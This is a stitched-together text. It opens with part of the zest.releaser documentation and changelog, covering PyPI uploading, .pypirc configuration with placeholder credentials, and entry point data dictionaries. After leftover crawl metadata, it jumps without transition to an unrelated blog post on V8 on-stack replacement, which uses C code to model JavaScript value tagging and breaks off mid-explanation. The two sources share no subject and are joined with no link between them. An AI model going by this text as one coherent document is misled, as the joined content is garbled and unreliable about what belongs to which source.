github: If you are going to do a fix or want to run the tests, please see the DEVELOPERS.txt file in the root of the package. Bugs can be added to . Note that there are alternative release scripts available, for instance which installs itself as a setuptools command ("python setup.py release"), so it "only" works with setuptools projects. Uploading to pypi server(s) Like noted earlier, for safety reasons zest.releaser will only offer to upload your package to when the package is already registered there. If this is not the case yet, you can go to the directory where zest.releaser put the checkout (or make a fresh checkout yourself. Then with the python version of your choice do: python setup.py register sdist upload For this to work you will need a .pypirc file in your home directory that has your pypi login credentials like this: [server-login] username:maurits password:secret Since python 2.6, or in earlier python versions with collective.dist, you can specify multiple indexes for uploading your package in .pypirc: [distutils] index-servers = pypi local [pypi] #pypi.python.org username:maurits password:secret [local] repository: username:maurits password:secret # You may need to specify the realm, which is the domain the # server sends back when you do a challenge: #realm:Zope See for more info. When all this is configured correctly, zest.releaser will first reregister and upload. Some people will hardly ever want to do a release on PyPI but in 99 out of 100 cases only want to create a tag. They won't like the default answer of 'yes'. Entrypoints documentation Warning: entry points were added in 3.0, I'm reserving the right to make backwards-incompatible changes to the entry point mechanism in the next couple of releases. It is a major new piece of functionality for zest.releaser and getting all the details right at the first attempt isn't guaranteed. A zest.releaser entrypoint gets passed a data dictionary and that's about it. You can do tasks like generating documentation. Or downloading external files you don't want to store in your repository but that you do want to have included in your egg. Every release step (prerelease, release and postrelease) has three points where you can hook in an entry point: - before - Only the workingdir and name are available in the data dictionary, nothing has happened yet. - middle - All data dictionary items are available and some questions (like new version number) have been asked. No filesystem changes have been made yet. - after - The action has happened, everything has been written to disk or uploaded to pypi or whatever. For the release step it made sense to create one extra entry point: - after_checkout - The middle entry point has been handled, the tag has been made, a checkout of that tag has been made and we are now in that checkout directory. Of course, when the user chooses not to do a checkout, this entry point never triggers. Note that an entry point can be specific for one package (usually the package that you are now releasing) or generic for all packages. An example of a generic one is gocept.zestreleaser.customupload, which offers to upload the generated distribution to a chosen destination (like a server for internal company use). If your entry point is specific for the current package only, you should add an extra check to make sure it is not run while releasing other packages; something like this should do the trick: def my_entry_point(data): if data['name'] != 'my.package': return ... Entry point specification An entry point. See the setup.py of zest.releaser itself for some real world examples. You'll have to make sure that the zest.releaser scripts know about your entry points, for instance by placing your egg (with entry point) in the same zc.recipe.egg section in your buildout as where you placed zest.releaser. Or, if you installed zest.releaser globally, your egg-with-entrypoint has to be globally installed, too. Prerelease data dict items - commit_msg - Message template used when committing - history_file - Filename of history/changelog file (when found) - history_header - Header template used for 1st history header - history_lines - List with all history file lines (when found) - name - Name of the project being released - new_version - New version (so 1.0 instead of 1.0dev) - original_version - Version before prereleasing (e.g. 1.0dev) - today - Date string used in history header - workingdir - Original working directory Release data dict items - name - Name of the project being released - tag_already_exists - Internal detail, don't touch this :-) - tagdir - Directory where the tag checkout is placed (if a tag checkout has been made) - version - Version we're releasing - workingdir - Original working directory Postrelease data dict items - commit_msg - Message template used when committing - dev_version - New development version with dev marker (so 1.1.dev0) - dev_version_template - Template for dev version number - history_header - Header template used for 1st history header - name - Name of the project being released - new_version - New development version (so 1.1) - nothing_changed_yet - First line in new changelog section - workingdir - Original working directory To do - Add some more tests (test coverage is at 95%, btw). - Add hg support for lasttagdiff. Credits - Reinout van Rees (The Health Agency)] 3.22 (2011-05-05) - Allow specifying a tag on the command line when using lasttaglog or lasttagdiff, to show the log or diff since that tag instead of the latest. Useful when you are on a branch and the last tag was from trunk. [maurits] 3.21 (2011-04-20) - Added lasttaglog command that list the log since the last tag. [maurits] - Fix Mercurial (hg) support. As spreaded_internal should be set to False (as it happens with git) [erico_andrei] - Accept a twiggle (or whatever '~' is called) when searching for headers in a changelog; seen in some packages (at least zopeskel.dexterity). [maurits] 3.20 (2011-01-25) - Also allowing CHANGES.rst and CHANGES.markdown in addition to CHANGES.txt. 3.19 (2011-01-24) - No longer refuse to register and upload a package on pypi if it is not there yet, forcing people to do this manually the first time. Instead, we ask the question and simply have 'No' as the default answer. If you specify an answer, we require exactly typing 'yes' or 'no'. The idea is still to avoid making it too easy to release an internal package on pypi by accident. [maurits] 3.18 (2010-12-08) - Added --non-interactive-- option to the svn diff command used in lasttagdiff. This makes it usable in cronjobs and post-commit hooks. Fixes 3.17 (2010-11-17) - When the package that is being released neither has a setup.py nor a setup.cfg, use No as default answer for creating a checkout of the tag. [maurits] 3.16 (2010-11-15) - For (pypi) output, also show the first few lines instead of only the last few. [maurits] - See if pypirc or setup.cfg has a [zest.releaser] section with option release = yes/no. During the release stage, this influences the default answer when asked if you want to make a checkout of the tag. The default when not set, is 'yes'. You may want to set this to 'no' if most of the time you only make releaser of internal packages for customers and only need the tag. [maurits] - Specify bazaar (bzr) tag numbers using the 'tag' revision specifier (like 'tag:0.1') instead of only the tag number (0.1) to add compatibility with earlier bzr versions (tested with 2.0.2). [maurits] For older changes see HISTORY.txt in the docs directory. -.30.xml Your entry point gets a data dictionary: the items you get in that dictionary are documented below. Some comments about them:
http://pypi.python.org/pypi/zest.releaser/3.30
crawl-003
refinedweb
2,033
67.76
The. This led to this year's lovely group picture: All participants (including staff) at the Randa Meetings 2015 First day - Day of arrival. After arrival people were shown their rooms so they could place their luggage and, if needed, recover a bit from the journey. As the arrivals were spread out over the whole day, not a lot of work and collaboration happened yet. It was mostly about meeting good old friends, new friends and putting faces to nicknames. And of course most people needed some new energy and thus food and drinks after there long journeys. Second day - Monday On the second day most of the participants have arrived and had enough sleep so they were ready for some work. However, most of the second day was spent on getting to know each other, talking with and getting to know the various different groups: - digiKam - professional photo management - KDE Connect - Connect with your Android devices - Multimedia - including Amarok and Kdenlive - PIM - The Kontact Suite - QMLweb - QML in the web browser - And the biggest group: Touch&Mobile - to bring Touch to KDE And, in the afternoon, listening to presentations from various people. The videos of these presentations are now available. During that time we also had our first local guests: a teacher and his students from a local vocational school visited us to get an overview on Free and Open Source Software, the KDE community and on what they will be doing in the Swiss mountains during the week. Tuesday to Friday - Work of various groups All the above mentioned groups worked on different ideas and projects but in the end the big topic and motto of 2015 was "Bring Touch to KDE". And although most of the participants of the Randa Meetings started their work even before the meetings, thought about the topics during their journeys and started with their work as soon as they met the first other participants on their paths to Randa the main working time of the KDE Tech Summit was the time from Tuesday to Friday. digiKam Gilles Caulier worked mostly on the KIPI-plugins port to Qt5 and reduce dependencies where possible to improve portability and reduce complicated code. He has backported MetadataEdit and GPYSync tools to digiKam core. Marcel Wiesweg concentrated on isolating and fixing a few performance-critical and/or critically annoying bugs that had shown up in the KF5-port. A large group of these turned out to be due to Qt's filter model dynamicSortFilter property being turned on per default in Qt5 (off in Qt4). With some more optimizations in the tag filter code, all models and views seemed to be performing very well again. Another big cleanup was needed for the (tag) completion code, with Qt5 providing the QCompleter API and the old kdelibs API gone. Shourya Singh Gupta worked on KIPI-plugins as well. He mostly worked towards refactoring remaining plugins using common classes created during GSoC 2015 and completing the KF5/Qt5 porting of KIPI-plugins. He also fixed dead plugins like Image Shack, removed dead UI components from plugins, made a new common KPLoginDialog class to support factorization of login dialog of plugins and factorized Yandex Fotki's and Image Shack's login dialog using KPLoginDialog. The digiKam Team At Work Late At Night Veaceslav Munteanu worked on further improvements for metadatahub. Now the metadatahub user interface can support more than tags, comments and rating. Adding a new category can be done very easily by setting default values and zero changes in user interface. Saving and retrieving namespace data from config was also simplified. Except metadatahub improvements, private linking to KIPI-plugins was added, and hardcoded icon paths were removed from the digiKam source code. Alexander Potashev made the last steps in a long way of porting KIPI-plugins to pure Qt5/KF5. As the result, all the plugins to be released with kipi-plugins-5.0.0 are now free of the kdelibs4support dependency. During the rest of the time he was thinking over and discussing possibilities to switch KIPI-plugins to a more generic interface to make them more usable to a wider range of applications, such as for example Kamoso, KMail and Blogilo. But this work is still yet to be done. And together the united digiKam team worked on the next big 5.0.0 version anticipated for April 2016. KDE Connect As the software that connects your KDE Plasma Desktop with your Android devices (and in the future possibly other mobile operating systems) the KDE Connect team worked on their first KF5-based release as well. During the Meetings in Randa they achieved a new Android Material design and reviewed their new security infrastructure based on SSL and encryption. Another great integration work was the mating of KDE Connect with KDE Telepathy and thus enable to answer your SMS or texting on your desktop. Please take a look and test the first new release. Multimedia On the multimedia side we had the yearly sprint on Amarok bug triaging and Myriam pushing out a beta release of the current state and last Qt4-based version. There was some work as well on porting Amarok to Qt5 and KF5 or at least some coordination work. Please get in contact if you can lend a helping hand to finish this port. The Kdenlive team - our great non-linear video editor - began with a bug fix day, just before the Applications 15.08.1 tagging, so as to get a release as solid as possible. Then they oriented on more social topics, as people in great position to help them were present. The Visual Design Group (VDG) people helped them to define their vision statement, and then lead a UI usability review, with a video editor new to Kdenlive. Kdenlive In A UI Discussion (and some visiting kids testing GCompris) Experienced Qt hackers helped them to investigate on an old complex bug; packagers introduced them to the way of properly preparing binaries. The Kdenlive team mentioned as well that they were interested in the sprint organization BoF (we hope to blog about this soon), in order to have small gatherings more regularly. During the last days Vincent and Jean-Baptiste had the pleasure to break things and add new features: - Saving only parts of the timeline, as a preparation to cross project copy and paste or sub-sequences creation - Automatic handling of transparent clips - Reflections on crossfades on same track All in all the Kdenlive team dedicated their time to intensive work and could get a lot of motivation, and several of the ideas that came out of it are currently being implemented or are being prepared for the next 15.12 release "that will be awesome thanks to Randa!" PIM - Personal Information Management The PIM group used the Randa Meetings for what they are best at: real-time face-to-face discussions. The first few days was really mostly spending on talking and finding a common ground to build on. Towards the middle of the week this base was found and they could start discuss, plan and design new aspects of Akonadi Next and Kontact Quick. QMLweb The QMLweb team found their way to Randa for the second or even third time but was never as big (although with 4 people still relatively small) as this year. And they worked on a big restructuring too. You can listen to more about it in this introduction video from Monday. Towards the end of the Meetings they start to implement their ideas and plans so we can curiously wait for blog posts about their progress for this time after Randa. Touch&Mobile - Bring Touch to KDE By far the biggest and still most heterogeneous group work on our main topic: to bring touch capabilities to more KDE software. Of general help for all the groups was the Visual Design Group (VDG) with their expertise in design, usability and user experiences. The icon guys Andreas and Uri talk with different projects about their needs of new and better icons and provided much help and insight in the process of icon creation. Heiko and Jens were part of several discussions regarding user interfaces design and helped different group to improve their first impression to new users. Scarlett and her team work hard on a revamp of our powerful and badly needed continuous integration (CI) system. This revamp is necessary to bring the CI system and thus our software to major platforms as MS Windows and Apples Mac OS X. And another goal with at least as much importance is the coverage of Android and maybe in the future even Windows Phone or iOS. Emmanuel helped a lot to start the work on Docker integration. Several of the KDE Edu projects were part of these meetings too and you can witness a lot of porting work and thus improvements for future mobile or touch friendly versions of this software. And particular group was the Marble hackers that worked on a vector-based display of the OpenStreetMap data. With a lot of success and even 3D views as can been seen in Dennis blog post "Vector Tiling in Marble Maps @Randa". Marble Maps is a real KDE Android application and just some days or weeks later Torsten announced that they new ship the oldest existent historic Globe (on Android too). Other educational application that were ported are Kalzium - the Periodic Table of Elements and KTurtle - an Educational Programming Environment. GCompris - Live User Testing Bruno of GCompris fame mentioned: GCompris had a nice and productive Randa Meetings this year. We completed two new activities, one named 'melody' where the children must memorize and reproduce a suite of notes played on a xylophone. The second one created by Holger is based on the physics engine Box2D and uses the mobile sensors to let the children move a ball by moving the tablet. This is a small step towards the completion of the port of GCompris. So far we ported 116 activities on the 140 of the GTK+ version. If this year is as productive as we have been for now, we will be in time to make a 'port complete' party for Randa next year." Additionally the GCompris team told us a bit about their experience of working with and porting to iOS. The application that probably got most work on the UI during the time in Randa was Artikulate - the Pronunciation Trainer. Andreas worked hard and in cooperation with different people and teams to reach his highly set goals. Dolphin gained ownCloud integration. Using KDE Applications 15.12 and ownCloud client 2.1 you will be able to see overlay icons within Dolphin and have an action to share files from the desktop. Another and by far not the least important project that was worked on in Randa is an easily available Android Build Environment to work on new KDE Android applications and porting of old KDE applications. The group wrote good documentation and prepared a Docker image to allow people to setup their build-environment with one command. They even started with testing and work on KDE Frameworks and their availability on Android. And last but not least the Calligra team with Friedrich and Leinir work on further porting and integration of the Gemini infrastructure. Thursday - Trip to Zermatt and Raclette On Thursday two special events took place. In the afternoon a trip to Zermatt, a rather famous Swiss mountain town only a couple of kilometers from Randa, was organized. A couple of local taxi buses drove people up to Zermatt, where Mario showed them around and people were able to buy various souvenirs and swiss chocolate. Afterwards a hike back to Randa was planned, roughly 10 kilometers down through forests and over meadows, following the river Vispa back to the house. This trip was optional, so a couple of people decided to rather stay in Randa and get more work done. Also for people not used to hiking or people who didn't bring decent shoes along it might have been a bit harsh, but in the end everybody enjoyed the trip and quite a lot of pictures were taken. And it was another good opportunity to discuss KDE topics cross-groups and with and in some fresh air. Every other day a smaller walk around Randa was organized or the different groups searched a path themselves. Standing In Line For The Raclette In the evening the second event took place: the traditional Raclette dinner with our sponsors. Raclette, a traditional swiss meal made out of molten cheese, served with potatoes, gherkins and usually wine, was rather well received by both the participants and also our sponsors. As last year, people, groups and companies that helped with monetary or hardware donations received an invitation to spend an evening with us, eating said Raclette, having good local wine and getting to know the event they made possible. It was a lovely ending to a great and rather eventful day. Saturday and Sunday - Pack your luggage For most of the participants Saturday was the day of packing the luggage, preparing for departure and thus saying good-bye which was not easy after a very productive and creative week with good old and new friends - the KDE family. Sunday was then definitely the day for everybody to leave as we needed to hand over the house at 11 am. So with half of the participants already gone and the other half helping to clean and clear the house the 6th edition of the Randa Meetings ended. The future - See you again next year? It was another very good and exhausting week in Randa. A lot was done, discussed and achieved but people were tired and headed to a more or less long way home. Organizational and administrative wise there is still work left to close all up and then we can start to think about another edition of the KDE Tech Summit called "Randa Meetings". Will you be part of it, will you help again, will you read about it?... If you would like to read even more about the Randa Meetings 2015 and also get some more personal views, a list of personal blog posts is available on our community wiki. Thanks to Gilles Caulier for the nice pictures. And for everybody that read the whole text here is a little surprise: you might add yourself to the date selection for the Randa Meetings 2016 as one of the first. Glad to read up on the progress. I hope Digikam 5.0 starts off as a stable port. A lot was invested in 4.x to make it stable. Also good to read about clean-ups in the KIPI Plugins. Thanks to all of you for making Digikam. Hey people of KDE, This is just a big shout out to you guys and your wonderful work. The new Breeze theme and icons just look awesomazing, the overall very consistent theming creates a very professional look and feel - it´s such a tremendous feeling to work with a beautiful desktop and an overall consistent experience. I´m an art teacher and I work with a Cintiq Companion 2 - so for me it´s great news, that you guys are focusing on touch integration (besides an already super desktop experience) and I really hope, that you will integrate graphic tablets as input devices in the system settings and maybe even throw in an onscreen keyboard (especially for the login screen). I would love it so much to go Linux/ KDE full time, but these little missing features force me to use Windows way more than I like to. KRunner, DigiKam, Dolphin, Krita, Calligra, Kdenlive and many more - it is simply amazing what you guys brought to the table of the open-source-community. Thank you very much for your hard work and rock on! Greetings David
https://dot.kde.org/2015/12/07/randa-meetings-2015-huge-success-again
CC-MAIN-2021-31
refinedweb
2,656
57.91
- Working with Live Tiles Locally - Rotating Live Tiles to keep interest - Modifying Live Tiles in a Background Process (This Post) - Using Azure and Push Notifications with Live Tiles Continuous updating with background processes In the previous posts we talked about the best practices for what to put on live tiles and also how to use the TileUpdateManager to change the tiles. In this and the Using Azure and Push Notifications with Live Tiles we will discuss how to make changes to your live tiles when the user is not using your application. As we learned in the last post, rotating your tiles is a great way to keep visual interest in your application or game but if the user is busy and does not have time to use your application for a week or two, the tiles that you updated will start to get stale quickly. Imagine the Sports, News, or Stocks application that has week old data. Updating your tiles with a background trigger is one way to keep it fresh. We are going to use the same project we used for the last post. If you did not create it in the last post and want to follow along, you can create a new project create a new WideLogo (See this post to find out how). Creating Rotating Live Tiles from a Background Trigger 1. In the Solution Explorer, right click on the Solution (NOT Project) and select Add à New Project 2. Select the Windows Runtime Component , name it TileBackground and click OK 3. The Class1.cs file from that project will open, for simplicity we will leave it named Class1 (you would want to rename this in a real project of course) 4. At the top of the Class1.cs file, add the following Using statements using Windows.ApplicationModel.Background;using Windows.Data.Xml.Dom;using Windows.UI.Notifications;using System.Net.Http;using Windows.Data.Xml.Dom;using System.IO; 5. Next, have class one implement the IBackgroundTask interface and delete the thrown exception that is generated. When you are done, your class should look like the image below. 6. Above the Run method add the follow declaration for TileUpdater TileUpdater tileUpdater; 7. Underneath the run method, add the AddTileNotification Method. This is the same code we have used in the other posts… only now it is going to be run in a background process. private void AddTileNotification(string content, string tag) { var templateType = TileTemplateType.TileWideSmallImageAndText04; var xml = TileUpdateManager.GetTemplateContent(templateType); var textNodes = xml.GetElementsByTagName("text"); textNodes[0].AppendChild(xml.CreateTextNode("A message")); textNodes[1].AppendChild(xml.CreateTextNode(content)); var imageNodes = xml.GetElementsByTagName("image"); var elt = (XmlElement)imageNodes[0]; elt.SetAttribute("src", "ms-appx:///_Images/Coffee03.jpg"); var tile = new TileNotification(xml); tile.Tag = tag; //tile.ExpirationTime = DateTimeOffset.Now.Add(new TimeSpan(0, 0, 20)); tileUpdater.Update(tile); } 8. Now we want to add something a little different to our project. Since you would want to pull data from somewhere outside of your project, we will simulate this by pulling a random quote from the IHeartQuotes API to show on our tile. Add the two methods below to your class. (These are the same ones we used previously with the Yahoo API (Since this post is about the tiles, we will not comment on the code below, we will do another post on calling REST APIs in the near future) private async void GetData() { String _url = ""; var _Result = await CallService(new Uri(_url)); if (_Result != null) AddTileNotification(_Result.quote, "tag new"); } private async Task<RootObject> CallService(Uri uri) { string _JsonString = string.Empty; // fetch from rest service var _HttpClient = new System.Net.Http.HttpClient(); try { HttpResponseMessage _HttpResponse = _HttpClient.GetAsync(uri.ToString()).Result; _HttpResponse.EnsureSuccessStatusCode(); _JsonString = await _HttpResponse.Content.ReadAsStringAsync(); } catch (Exception ex) { string test = ex.ToString(); } // deserialize json to objects var _JsonBytes = Encoding.Unicode.GetBytes(_JsonString); using (MemoryStream _MemoryStream = new MemoryStream(_JsonBytes)) { var _JsonSerializer = new DataContractJsonSerializer(typeof(RootObject)); var _Result = (RootObject)_JsonSerializer.ReadObject(_MemoryStream); return _Result; } } 9. Next, we want to add the code we want to run in the Run method. Add the following code INSIDE the Run(IBackgroundTaskInstance taskInstance) method. BackgroundTaskDeferral deferral = taskInstance.GetDeferral(); tileUpdater = TileUpdateManager.CreateTileUpdaterForApplication(); tileUpdater.EnableNotificationQueue(true); AddTileNotification("Hey Everyone... Whats up", "tag1"); AddTileNotification("Come see the new coffee shops", "tag2"); AddTileNotification("I need caffine", "tag3"); AddTileNotification("I drink coffee therfore I live", "tag4"); AddTileNotification("Caffine Drip please", "tag5"); GetData(); deferral.Complete(); 10. Now all we have left is to add the class that the json that is returned will be deserialized into. We once again used json2csharp.com to create a class. Add the code BELOW Class1 inside the Namespace bracket. (We could have put this in a separate file but will do this for simplicity. public sealed class RootObject{ public string json_class { get; set; } public IList<string> tags { get; set; } public string quote { get; set; } public string link { get; set; } public string source { get; set; }} That completes the project that will run in the background with the trigger is fired. Call your background trigger from your application. Now we are going to set up our project to allow background triggers and call the trigger from our project. 1. Right click on the References folder in your windows 8 project and click on Add Reference. 2. When the Reference Manager comes up, Select Solution and Projects on the left and click on the TileBackground project, and then click on OK 3. Now, double click on Package_appmanifest in the solution exploer and open it to the Declarations Tab 4. From the Available Declarations dropdown select Background Tasks 5. Click on ADD 6. Under Properties (on this page) check the Timer Task, and add the text TileBackground.Class1 to the EntryPoint section (This is the Namespace and Class for our background process which we just referenced) 7. Now click on the Application UI tab (should have a red x next to it) and scroll down to the Notification section. 8. Change the Lock screen notification dropdown to Badge 9. Change the Badge logo to Assets\<TheNameOfYourLogo>.png YOU WILL NEED TO CREATE THIS IMAGE. Please see this post on how to modify an image. The image size will need to be 24 X 24. The name of your logo may be different, obviously change this to what you named your logo. 10. Open up App.xaml.cs (from solution explorer) and add the following using statement to the top of the file. using Windows.ApplicationModel.Background; SPECIAL NOTE : We are placing this in the App.xaml.cs file for simplicity. This may or may not be where you want to launch your background task. Other options are the OnNavigatedTo method of your first page. 11. Now add the RegisterBackgroundTasks() method to the class. This calls the BackgroundTaskBuilder and adds our trigger to the OS. private void RegisterBackgroundTasks() { BackgroundTaskBuilder builder = new BackgroundTaskBuilder(); // Friendly string name identifying the background task builder.Name = "BackgroundLiveTiles"; // Class name builder.TaskEntryPoint = "TileBackground.Class1"; IBackgroundTrigger trigger = new TimeTrigger(15, true); builder.SetTrigger(trigger); IBackgroundCondition condition = new SystemCondition(SystemConditionType.InternetAvailable); builder.AddCondition(condition); IBackgroundTaskRegistration task = builder.Register(); //YOu have the option of implementing these events to do something upon completion //task.Progress += task_Progress; //task.Completed += task_Completed; } NOTE: Make sure you named your project and class with the same case sensitivity as I instructed, TileBackground.Class1 , if you did not you will need to change it in the code above. Since it is just a string you will NOT get an error here. 12. Finally, make a call to the RegisterBackgroundTasks() method inside the OnLaunched() Method as shown below. That is all that is needed to set up our trigger to change out live tile in the background while we are not running. How to Run your background trigger during debug. Now we are going to show you how you can get your trigger to run while you are debugging your application. 1. Build and run the project 2. While the project is still running, switch back to Visual Studio 3. From the Suspend dropdown menu (if you set everything up correctly) you will see your background process trigger. Select this and it will fire your trigger. If you don’t see this toolbar, in Visual Studio, go to View –> Toolbars and make sure Debug and Debug Location are checked. 4. If you now look at your tile on the start page, it should show you rotating quotes, including one from the quotes service as below. (Quotes will vary) That’s it for this post, in the next post we will show you how to use Azure and Push notifications to accomplish this same thing. Happy Programming Daniel Egan – The Sociable Geek
https://thesociablegeek.com/category/windows-8/livetiles/
CC-MAIN-2022-40
refinedweb
1,441
57.67
Java For Dummies, 8th EditionExplore Book Buy On Amazon intvalue inside a switchstatement works in any version of Java, old or new. (For that matter, charvalues and a few other kinds of values have worked in Java's switchstatements ever since Java was a brand-new language.) Starting with Java 7, you can set it up so that the case to be executed in a switch statement depends on the value of a particular string. The code below illustrates the use of strings in switch statements. This code illustrates a switch statement with a string. import static java.lang.System.out; import java.util.Scanner; public class SwitchIt7 { public static void main(String args[]) { Scanner keyboard = new Scanner(System.in); out.print("Which verse (one, two or three)? "); String verse = keyboard.next(); switch (verse) { case "one": out.println("That's because he has no brain."); break; case "two": out.println("That's because he is a pain."); break; case "three": out.println("'Cause this is the last refrain."); break; default: out.println("No such verse. Please try again."); break; } out.println("Ohhhhhhhh… ."); keyboard.close(); } } Get some practice with if statements and switch statements! Write a program that inputs the name of a month and outputs the number of days in that month. In this first version of the program, assume that February always has 28 days. Make your code even better! Have the user input a month name, but also have the user input yes or no in response to the question Is it a leap year?
https://www.dummies.com/article/technology/programming-web-design/java/use-strings-java-switch-statement-239328/
CC-MAIN-2022-21
refinedweb
257
70.19
#include <math.h> These functions calculate the Gamma function of x. The Gamma function is defined by Gamma(x) = integral from 0 to infinity of t^(x−1) e^−t − x) = PI / sin(PI * x) On success, these functions return Gamma −0 or +0, a pole error occurs, and the functions return HUGE_VAL, HUGE_VALF, or HUGE_VALL, respectively, with the same sign as the 0. See math_error(7) for information on how to determine whether an error has occurred when calling these functions. The following errors can occur: xis a negative integer, or negative infinity errno is set to EDOM. An invalid floating-point exception ( FE_INVALID) is raised (but see BUGS). xis +0 or −0 errno is set to ERANGE. A divide-by-zero floating-point exception ( FE_DIVBYZERO) is raised. errno is set to ERANGE. An overflow floating-point exception ( FE_OVERFLOW) is raised. glibc also gives the following error which is not specified in C99 or POSIX.1-2001. An underflow floating-point exception ( FE_UNDERFLOW) is raised, and errno is set to ERANGE. For an explanation of the terms used in this section, see attributes(7). This function had to be called "true gamma function" since there is already a function gamma(3) that returns something else (see gamma(3) for details). Before version 2.18, the glibc implementation of these functions did not set errno to EDOM when x is negative infinity. Before glibc 2.19, the glibc implementation of these functions did not set errno to ERANGE on an underflow range error. x In glibc versions 2.3.3 and earlier, an argument of +0 or −0 incorrectly produced a domain error ( errno set to EDOM and an FE_INVALID exception raised), rather than a pole error.
http://manpages.courier-mta.org/htmlman3/tgamma.3.html
CC-MAIN-2021-17
refinedweb
287
57.37
how to make a simple password lock in c++?? i want a alphabetic lock btw thanks for helping Can you please clarify? You want to have a prompt such as : "Enter the password: " and then check if the password that is entered is correct? Depending on the security level needed, you could just hardcode the password in the code and do a string comparison. Another common feature would be to "mask" the password that is entered (with *'s perhaps), but I don't know how to go about that. Dave I think it's inpossible to replace typed letters/numbers with a '*' in c++, however you could get keyboard input directly with kb_hit(). To use the function kb_hit() you need to have the C header 'conio.h'. #include <conio.h> For example; char example[10] if (kb_hit()==TRUE) { example=getchar(); } We're a friendly, industry-focused community of 1.18 million developers, IT pros, digital marketers, and technology enthusiasts learning and sharing knowledge.
https://www.daniweb.com/programming/software-development/threads/298596/how-to-make-a-simple-password-lock-in-c
CC-MAIN-2020-24
refinedweb
163
62.78
- Step Seek sponsorship. Talk about what you would like from your sponsors (supplies, money, discounts, etc.) and explain to them what you will be doing in return (patronage, advertising, image). Be realistic and don't expect too much. - Step 5 Find a home field. (See "How to Find a Paintball Field.") It should be somewhere local where you all like to play. Talk with the owner and see how he feels about your team calling his field "home." Offer to help referee and clean up in exchange for discounts or use of a practice field. - Step 6 Play together as a team as much as possible, focusing on tactics and strategy. Talk before and after each game about what went right and wrong. - Step 7 Enter a tournament and represent your sponsors well by displaying good sportsmanship whether you win or lose. avorthni said. avorthni said! Anonymous said. Anonymous said. Anonymous said on 7/25/2006 It is best to practice at a field you play at often. Not only do random players come in and test your skill against new opponents, you also build a bond with the field owner, which could lead to partial sponsorships down the road.
http://www.ehow.com/how_7319_start-paintball-team.html
crawl-002
refinedweb
200
82.54
#include <presence.h> #include <presence.h> Inherits Stanza. Inheritance diagram for Presence: Definition at line 32 of file presence.h. Describes the different valid presence types. Definition at line 42 of file presence.h. EmptyString 0 Creates a Presence request. Definition at line 73 of file presence.cpp. [virtual] Destructor. Definition at line 82 of file presence.cpp. [inline] Adds a (possibly translated) status message. Definition at line 117 of file presence.h. A convenience function returning the stanza's Capabilities, if any. May be 0. Definition at line 104 of file presence.cpp. Returns the presence's type. Definition at line 89 of file presence.h. Returns the presence priority in the legal range: -128 to +127. Definition at line 131 of file presence.h. Resets the default status message as well as all language-specific ones. Definition at line 87 of file presence.cpp. Sets the presence type. Definition at line 95 of file presence.h. Sets the priority. Legal range: -128 to +127. Definition at line 94 of file presence.cpp. "default" Returns the status text of a presence stanza for the given language if available. If the requested language is not available, the default status text (without a xml:lang attribute) will be returned. Definition at line 106 of file presence.h. Definition at line 76 of file presence.h. Creates a Tag representation of the Stanza. The Tag is completely independent of the Stanza and will not be updated when the Stanza is modified. Implements Stanza. Definition at line 109 of file presence.cpp.
http://camaya.net/api/gloox-trunk/classgloox_1_1Presence.html
crawl-001
refinedweb
259
55.2
on-stack replacement in v8 A recent post looked at what V8 does with a simple loop: function g () { return 1; } function f () { var ret = 0; for (var i = 1; i < 10000000; i++) { ret += g (); } return ret; } It turns out that calling f actually inlines g into the body, at runtime. But how does V8 do that, and what was the dead code about? V8 hacker Kasper Lund kindly chimed in with an explanation, which led me to write this post. When V8 compiled an optimized version of f with g, it decided to do so when f was already in the loop. It needed to stop the loop in order to replace the slow version with the fast version. The mechanism that it uses is to reset the stack limit, causing the overflow handler in g to be called. So the computation is stuck in a call to g, and somehow must be transformed to a call to a combined f+g. The actual mechanics are a bit complicated, so I'm going to try a picture. Here we go: As you can see, V8 replaces the top of the current call stack with one in which the frames have been merged together. This is called on-stack replacement (OSR). OSR takes the contexts of some contiguous range of function applications and the variables that are live in those activations, and transforms those inputs into a new context or contexts and live variable set, and splats the new activations on the stack. I'm using weasel words here because OSR can go both ways: optimizing (in which N frames are combined to 1) and deoptimizing (typically the other way around), as Hölzle notes in "Optimizing Dynamically-Dispatched Calls with Run-Time Type Feedback". More on deoptimization some other day, perhaps. The diagram above mentions "loop restart entry points", which is indeed the "dead code" that I mentioned previously. That code forms part of an alternate entry point to the function, used only once, when the computation is restarted after on-stack replacement. details, godly or otherwise Given what I know now about OSR, I'm going to try an alternate decompilation of V8's f+g optimized function. This time I am going to abuse C as a high-level assembler. (I know, I know. Play along with me :)) Let us start by defining our types. typedef union { uint64_t bits; } Value; typedef struct { Value map; uint64_t data[]; } Object; All JavaScript values are of type Value. Some Values encode small integers (SMIs), and others encode pointers to Object. Here I'm going to assume we are on a 64-bit system. The data member of Object is a tail array of slots. inline bool val_is_smi (Value v) { return !(v.bits & 0x1); } inline Value val_from_smi (int32 i) { return (Value) { ((uint64_t)i) << 32 }; } inline int32 val_to_smi (Value v) { return v.bits >> 32; } Small integers have 0 as their least significant bit, and the payload in the upper 32 bits. Did you see the union literal syntax here? (Value){ ((uint64_t)i) << 32 }? It's a C99 thing that most folks don't know about. Anyway. inline bool val_is_obj (Value v) { return !val_is_smi (v); } inline Value val_from_obj (Object *p) { return (Value) { ((uint64_t)p) + 1U }; } inline Object* val_to_obj (Value v) { return (Object*) (v.bits - 1U); } Values that are Object pointers have 01 as their least significant bits. We have to mask off those bits to get the pointer to Object. Numbers that are not small integers are stored as Object values, on the heap. All Object values have a map field, which points to a special object that describes the value: what type it is, how its fields are laid out, etc. Much like GOOPS, actually, though not as reflective. In V8, the double value will be the only slot in a heap number. Therefore to access the double value of a heap number, we simply check whether the Object's map is the heap number map, and in that case return the first slot, as a double. There is a complication though; what is value of the heap number map? V8 actually doesn't encode it into the compiled function directly. I'm not sure why it doesn't. Instead it stores the heap number map in a slot in the root object, and stores a pointer into the middle of the root object in r13. It's as if we had a global variable like this: Value *root; // r13 const int STACK_LIMIT_IDX = 0; const int HEAP_NUMBER_MAP_IDX = -7; // Really. inline bool obj_is_double (Object* o) { return o->map == root[HEAP_NUMBER_MAP_IDX]; } Indeed, the offset into the root pointer is negative, which is a bit odd. But hey, details! Let's add the functions to actually get a double from an object: union cvt { double d; uint64_t u; }; inline double obj_to_double (Object* o) { return ((union cvt) { o->data[0] }).d; } inline Object* double_to_obj (double d) { Object *ret = malloc (sizeof Value * 2); ret->map = root[HEAP_NUMBER_MAP_IDX]; ret->data[0] = ((union cvt) { d }).u; return ret; } I'm including double_to_obj here just for completeness. Also did you enjoy the union literals in this block? So, we're getting there. Perhaps the reader recalls, but V8's calling convention specifies that the context and the function are passed in registers. 